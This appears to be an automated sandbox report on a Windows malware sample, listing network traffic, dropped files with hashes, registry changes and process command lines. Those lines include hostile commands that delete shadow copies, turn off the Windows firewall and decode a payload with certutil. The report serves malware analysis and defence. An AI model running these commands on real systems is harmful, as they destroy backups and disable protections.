| GB | 51.140.244.186:443 | nav-edge.smartscreen.microsoft.com | tcp |
| GB | 51.140.244.186:443 | nav-edge.smartscreen.microsoft.com | tcp |
| US | 8.8.8.8:53 | www.microsoft.com | udp |
| US | 8.8.8.8:53 | 186.244.140.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | c.s-microsoft.com | udp |
| US | 8.8.8.8:53 | c.s-microsoft.com | udp |
| US | 8.8.8.8:53 | edgestatic.azureedge.net | udp |
| US | 8.8.8.8:53 | edgestatic.azureedge.net | udp |
| US | 13.107.253.64:443 | edgestatic.azureedge.net | tcp |
| US | 13.107.253.64:443 | edgestatic.azureedge.net | tcp |
| US | 13.107.253.64:443 | edgestatic.azureedge.net | tcp |
| US | 8.8.8.8:53 | wcpstatic.microsoft.com | udp |
| US | 8.8.8.8:53 | wcpstatic.microsoft.com | udp |
| US | 13.107.253.64:443 | edgestatic.azureedge.net | tcp |
| US | 13.107.246.64:443 | wcpstatic.microsoft.com | tcp |
| US | 8.8.8.8:53 | 64.253.107.13.in-addr.arpa | udp |
| N/A | 224.0.0.251:5353 | N/A | udp |
| BE | 2.17.107.112:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 112.107.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.106.137.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| DE | 18.192.31.165:443 | cdn.ngrok.com | tcp |
| DE | 18.192.31.165:443 | cdn.ngrok.com | tcp |
| US | 8.8.8.8:53 | 31.243.111.52.in-addr.arpa | udp |
| BE | 2.17.107.112:443 | www.bing.com | tcp |
| DE | 18.192.31.165:443 | cdn.ngrok.com | tcp |
| DE | 18.192.31.165:443 | cdn.ngrok.com | tcp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| BE | 2.17.107.128:443 | www.bing.com | udp |
| US | 8.8.8.8:53 | 128.107.17.2.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\Admin.log
| MD5 | b82d5c0a5deeca2c89b8fd16911c11f1 |
| SHA1 | 99fea8c7d2781d6b13886ce8f50b1f4b9beac961 |
| SHA256 | 7e2f4567e9674aa2e0e170a42ae7011a295dbce5f449cf7cf778e3ff732bd9e5 |
| SHA512 | 1c3646bf08ceeefcd4d22d882803083da2049ac0a2ba935c94ab6a7bf0642dddf855d684f89e17e96544324699416c25e191ace1cd7b3c52853c8c2c69c8c185 |
C:\Users\Admin\AppData\Local\Temp\Image.bin
| MD5 | eb05f382514e1a62572f9afd06a0a50d |
| SHA1 | 86a601e6b8a6e0dee089a66707a9a1d80bd33ba5 |
| SHA256 | 24c3df9a48a7d1abd01b3a608505a33a3a2d3d907c7b6dad79c0f0da01125ab9 |
| SHA512 | 2b46fcbcd1a35e09c22f3230b690783121fbdd504e4f3f34d3e1753db63d6720e5c6d752bad2d2015326e165b08b13d4c4ed7611cdaaad0e1f52a357e270a79f |
C:\Users\Admin\AppData\Local\Temp\0.vbs
| MD5 | 5b2f4b19baac5325cbeae4d8024d064c |
| SHA1 | 4f109afc12cec097f003f1723c1da56940f69b8f |
| SHA256 | 43464f239bf395e90405c7579f7380d06a0b581bbd0a8ca836b05a82808be78e |
| SHA512 | 7deb4fea0601cd364bda06c74d6a5d52ffb3d16935d8552c91ebca7d790f6566c64746ff58e61936356758f4b93d91931d477c363ccc4af9a133e0456f9fb40b |
C:\Users\Admin\AppData\Local\Temp\Admin.log
| MD5 | 84e76c4333a2e08f687b8cd18eed901e |
| SHA1 | 723033d08ec213f2fc8358b202e92734a873a117 |
| SHA256 | 15a7094f601c041e396c09c13148669121b3740d296003f7428cfe3e0c4bc030 |
| SHA512 | f0d6b8fd00ee2f133cb726b5726cc915dfad60a8149726e472b90b33fc31e9415215209eddffff0c86645b4e4e2c108041a91b7fafebe1958c89149e166a56e7 |
C:\Users\Admin\AppData\Local\Temp\Admin.log
| MD5 | ce4b7fda2db2db095ebd6728b8878082 |
| SHA1 | 41a7af0010d162f0971dadae6506d33836a2e66b |
| SHA256 | 503f44c1d079ebd27f4ff70acc01d09b18836258b6a35ba68ec4087521dc3afe |
| SHA512 | f4d0fd7eea4824b6e62505940dd0a348545111723b432da572543699e62243d1c0cf087b49fbf3622fa31635e61f0a538e64a06e8987e6c9c1984b5db35c092f |
C:\Users\Admin\AppData\Local\Temp\Admin.log
| MD5 | 3326820872eea8ff3eb2fdca6920a0d6 |
| SHA1 | 6cb64b5dc48b4e29b2f40f68250697964881887a |
| SHA256 | c8b13e87732c28675e6830404a613a7bce8e1570e81e46bdc62f2e6198c56432 |
| SHA512 | c40975c7e2b9a1be6af440b3059b20acc45dbd2d8260f496c86e79a7973a3a7f2c3ea3ee045f62f3c20f7dd56c44eec5ab25d04725cfb51e4e53f32630c2640f |
C:\Users\Admin\AppData\Local\Temp\Admin.log
| MD5 | 267373976517f497713da6526f2a5919 |
| SHA1 | 7b0384a5cbc5ed3b6dd5bf6f35a69261ad89708c |
| SHA256 | 7595c53f65129cce5d83227f7d4175d3340aeb31ce13f04fa40fde5c695f921a |
| SHA512 | 0e4dd83d0bd2a3d7eb134242a4f913aa97547e69fcf0989f1c55446cd62673c3cc91c2868f77cf0f0dd3048e8c7c051fc03b1cb56f489f54a75070d71a9e1c75 |
C:\Users\Admin\AppData\Local\Temp\Admin.log
| MD5 | ff919ef1b4964694a371969a0a8fdc03 |
| SHA1 | 794b2d5a72d9116001deb47cfdc1947469494d6b |
| SHA256 | fafe968b635719a9e69e81e3bfe5a9021c1b044991508db15df67e125c9bcf76 |
| SHA512 | d6458bfe62a41eee2a4e27567942b091f7373d1d70ad11796a0ce4b75764fe38870a9bbd86a886dc111ef21d9b8ecdaec086e58ff9fa6ef1d40830771c2204bd |
C:\Users\Admin\AppData\Local\Temp\Data.lp
| MD5 | c63727e7d32cd53e644d8ab3435778fa |
| SHA1 | 4f187b6d1a0839ffff7bcc69368b40ca007067b3 |
| SHA256 | 91d5604845d13992f916f56c2301cf866973520ef647a5d7073cdddc0bca3d00 |
| SHA512 | 278aa953b1578c2b7eebcd6d4dc3241a3e8862ce1ebafb2e37ec3715f2f92833f147c41227052f8ec6f06ae35d71f810913b3c28dd1675ee5e473559b3e85bc7 |
C:\Users\Admin\AppData\Local\Temp\KillWin.exe
| MD5 | 3713a4dfdfa399b20561aa8bcbea1b25 |
| SHA1 | 8109cb8e9e9c00fba74d456c1756799c72072989 |
| SHA256 | 8e4e731640114f96219d4aa6ce2416c2f1db7e75834cdca91c380de6b0eebbaa |
| SHA512 | a34244e4622648dc19f2efa001bf461cec7794bb7050fadacd5369272d83db87fef711afbb5a108b7665304430a419ee7fdf09c2e8155f496eba1a321142b090 |
C:\Users\Admin\AppData\Local\Temp\22211_1823.bat
| MD5 | 71f2ece5d6de26f528ff0e1c9382f1c9 |
| SHA1 | 12b4fe9e4f1d4e0ea494393282baeb58f5991c8e |
| SHA256 | 648b31ac461f2539e111298e9d5f8e154ed8852a4f8c57cceec17504da8cdb01 |
| SHA512 | 0236aa82c44f9cdc7230d2b46c910c794820202e697031c893ed8502883f310bc202beee7d4a502f5508c8f6c320f9479e48be30f24f344624a0224a1f549c56 |
C:\Users\Admin\AppData\Local\Temp\m.vbs
| MD5 | cbaa7c6cb3c383b11dd691b316f2a91b |
| SHA1 | 0f2d66cea7cc24e0dda9972e05a7b236a9bcbc9e |
| SHA256 | 5f1ffcde4ee668c3350fdd9730df67adc35c704342ac2224924069c9bae2be95 |
| SHA512 | fe74a8ccd7875e7bf9588d386fd886810dc0edd01216bf5a886add985fcbb813296a606ec83028a90d30b4df348125827300a98f2ec6081a5d981d09316a44f9 |
Analysis: behavioral1
Detonation Overview
Submitted
2024-06-26 08:19
Reported
2024-06-26 08:22
Platform
win7-20240508-en
Max time kernel
117s
Max time network
119s
Command Line
Signatures
Deletes shadow copies
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
Sets file to hidden
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
Enumerates connected drives
| Description | Indicator | Process | Target |
| File opened (read-only) | \??\A: | C:\Windows\system32\cmd.exe | N/A |
| File opened (read-only) | \??\B: | C:\Windows\system32\cmd.exe | N/A |
| File opened (read-only) | \??\E: | C:\Windows\system32\cmd.exe | N/A |
Sets desktop wallpaper using registry
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Wallpaper.jpeg" | C:\Windows\system32\wscript.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Wallpaper.jpeg" | C:\Windows\system32\wscript.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Wallpaper.jpeg" | C:\Windows\system32\wscript.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Wallpaper.jpeg" | C:\Windows\system32\wscript.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Wallpaper.jpeg" | C:\Windows\system32\wscript.exe | N/A |
Enumerates physical storage devices
Event Triggered Execution: Netsh Helper DLL
| Description | Indicator | Process | Target |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
Gathers network information
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\ipconfig.exe | N/A |
Interacts with shadow copies
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\vssadmin.exe | N/A |
Modifies Control Panel
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000\Control Panel\Desktop | C:\Windows\system32\wscript.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000\Control Panel\Desktop | C:\Windows\system32\wscript.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000\Control Panel\Desktop | C:\Windows\system32\wscript.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000\Control Panel\Desktop | C:\Windows\system32\wscript.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000\Control Panel\Desktop | C:\Windows\system32\wscript.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000\Software\Microsoft\Internet Explorer\Toolbar | C:\Windows\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000\Software\Microsoft\Internet Explorer\Toolbar\Locked = "1" | C:\Windows\explorer.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0 | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0\0 = 4c00310000000000a858d38210204c6f63616c00380008000400efbea8588181a858d3822a000000fe0100000000020000000000000000000000000000004c006f00630061006c00000014000000 | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 = 19002f433a5c000000000000000000000000000000000000000000 | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\MRUListEx = 00000000ffffffff | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\MRUListEx = 00000000ffffffff | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000_Classes\Local Settings | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 = 14001f50e04fd020ea3a6910a2d808002b30309d0000 | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0\0 | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0\0\0 | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 00000000ffffffff | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0 = 5200310000000000a8588181122041707044617461003c0008000400efbea8588181a85881812a000000eb0100000000020000000000000000000000000000004100700070004400610074006100000016000000 | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\1 | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff | C:\Windows\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0\0\0\NodeSlot = "1" | C:\Windows\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\KnownFolderDerivedFolderType = "{57807898-8C4F-4462-BB63-71042380B109}" | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0 | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0 = 4c00310000000000a8587084100041646d696e00380008000400efbea8588181a85870842a00000030000000000004000000000000000000000000000000410064006d0069006e00000014000000 | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0 | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0\MRUListEx = 00000000ffffffff | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0\0\0 = 4a00310000000000da588242102054656d700000360008000400efbea8588181da5882422a000000ff010000000002000000000000000000000000000000540065006d007000000014000000 | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0\0\0\MRUListEx = ffffffff | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0 = 7400310000000000a85881811100557365727300600008000400efbeee3a851aa85881812a000000e601000000000100000000000000000036000000000055007300650072007300000040007300680065006c006c00330032002e0064006c006c002c002d0032003100380031003300000014000000 | C:\Windows\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\SniffedFolderType = "Generic" | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\MRUListEx = 00000000ffffffff | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02 | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0\0\MRUListEx = 00000000ffffffff | C:\Windows\explorer.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A |
| Token: SeAuditPrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Volume Shadow Copy service COM API
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
Processes
C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\22.bat"
C:\Windows\system32\attrib.exe
attrib Admin-information.log +h
C:\Windows\explorer.exe
explorer .
C:\Windows\system32\ipconfig.exe
ipconfig /all
C:\Windows\explorer.exe
C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
C:\Windows\System32\Wbem\WMIC.exe
wmic shadowcopy delete
C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssadmin.exe
vssadmin delete shadows /all/quiet
C:\Windows\system32\netsh.exe
netsh advfirewall set currentprofile state off
C:\Windows\system32\mode.com
mode con: cols=170 lines=45
C:\Windows\system32\certutil.exe
certutil -decode "Image.bin" "Wallpaper.jpeg"
C:\Windows\system32\timeout.exe
timeout /t 3
C:\Windows\system32\timeout.exe
timeout /t 3
C:\Windows\system32\timeout.exe
timeout /t 3
C:\Windows\system32\timeout.exe
timeout /t 5
C:\Windows\system32\timeout.exe
timeout /t 5
C:\Windows\system32\wscript.exe
wscript "0.vbs"
C:\Windows\system32\wscript.exe
wscript "0.vbs"
C:\Windows\system32\wscript.exe
wscript "0.vbs"
C:\Windows\system32\wscript.exe
wscript "0.vbs"
C:\Windows\system32\wscript.exe
wscript "0.vbs"
C:\Windows\system32\timeout.exe
timeout /t 4
C:\Windows\System32\RUNDLL32.EXE
"C:\Windows\System32\RUNDLL32.EXE" user32.dll, UpdatePerUserSystemParameters
C:\Windows\System32\RUNDLL32.EXE
"C:\Windows\System32\RUNDLL32.EXE" user32.dll, UpdatePerUserSystemParameters
C:\Windows\System32\RUNDLL32.EXE
"C:\Windows\System32\RUNDLL32.EXE" user32.dll, UpdatePerUserSystemParameters
C:\Windows\System32\RUNDLL32.EXE
"C:\Windows\System32\RUNDLL32.EXE" user32.dll, UpdatePerUserSystemParameters
C:\Windows\System32\RUNDLL32.EXE
"C:\Windows\System32\RUNDLL32.EXE" user32.dll, UpdatePerUserSystemParameters
C:\Windows\system32\certutil.exe
certutil -decode "Data.lp" "KillWin.exe"
C:\Windows\system32\wscript.exe
wscript "m.vbs"
Network
Files
memory/2592-0-0x00000000039A0000-0x00000000039B0000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Admin.log
| MD5 | 9882f66d29c98a9e62598f7ca6adec56 |
| SHA1 | 021f34f144313bd04a54bc38239d8e7dfb158631 |
| SHA256 | 3bf0cf94c3419071a6223cc64eefe598a96ddfea15fc3f15552b98e560b0a3bf |
| SHA512 | d4a4be97cf2e09006ba65f681f8e7aa00b4d6a0b0a6073c02fe1f90bd1717c3f09071e44f88c25070be84a17c512317c5c1e068b2f47a978cc78671c5c707421 |
C:\Users\Admin\AppData\Local\Temp\Admin.log
| MD5 | e9ef8f6a7d04db16f1743173089d5a80 |
| SHA1 | 49182dd2d8c4ebde136473d6bae123c8035bdce4 |
| SHA256 | 6f6bb9b6a6d282981f42c22e37210bbd2d7cf1d9e69a4273cdf9d2a628efc749 |
| SHA512 | a0884f7e360cbca6a27fcba5155f7545decc450e85613bb4ad511ea7c6717cb067c60fbe1abde912fa2d4090ac520ab3ca6e26fd25812f427dceb91b82ade3e9 |
C:\Users\Admin\AppData\Local\Temp\Image.bin
| MD5 | eb05f382514e1a62572f9afd06a0a50d |
| SHA1 | 86a601e6b8a6e0dee089a66707a9a1d80bd33ba5 |
| SHA256 | 24c3df9a48a7d1abd01b3a608505a33a3a2d3d907c7b6dad79c0f0da01125ab9 |
| SHA512 | 2b46fcbcd1a35e09c22f3230b690783121fbdd504e4f3f34d3e1753db63d6720e5c6d752bad2d2015326e165b08b13d4c4ed7611cdaaad0e1f52a357e270a79f |
C:\Users\Admin\AppData\Local\Temp\TempData\Null.dll
| MD5 | 453468cc569708abb4fe3a00a475d096 |
| SHA1 | 4cf6be38a9589675cffd62316c0544abc66b1459 |
| SHA256 | 287b3124063720a50127e3a8bdde6b2f7c7e4432d90830de05b52ae14de78399 |
| SHA512 | e987c9a967262388e3815d0f10dd75a794f7862b01c69d58615c9c4deaea64647367d3461d910905915927ad0a3f90e0f573f60c51b83faa90df50511e656d46 |
C:\Users\Admin\AppData\Local\Temp\0.vbs
| MD5 | 5b2f4b19baac5325cbeae4d8024d064c |
| SHA1 | 4f109afc12cec097f003f1723c1da56940f69b8f |
| SHA256 | 43464f239bf395e90405c7579f7380d06a0b581bbd0a8ca836b05a82808be78e |
| SHA512 | 7deb4fea0601cd364bda06c74d6a5d52ffb3d16935d8552c91ebca7d790f6566c64746ff58e61936356758f4b93d91931d477c363ccc4af9a133e0456f9fb40b |
C:\Users\Admin\AppData\Local\Temp\Wallpaper.jpeg
| MD5 | 1285cd98536d791db631ac4bbc4520b1 |
| SHA1 | c0cf2a608361742736fc886ee837c6a501cc1ed1 |
| SHA256 | 8f16b68a09fb1ac498e34054c6b31634a7fba08204678b19d449f617c303c674 |
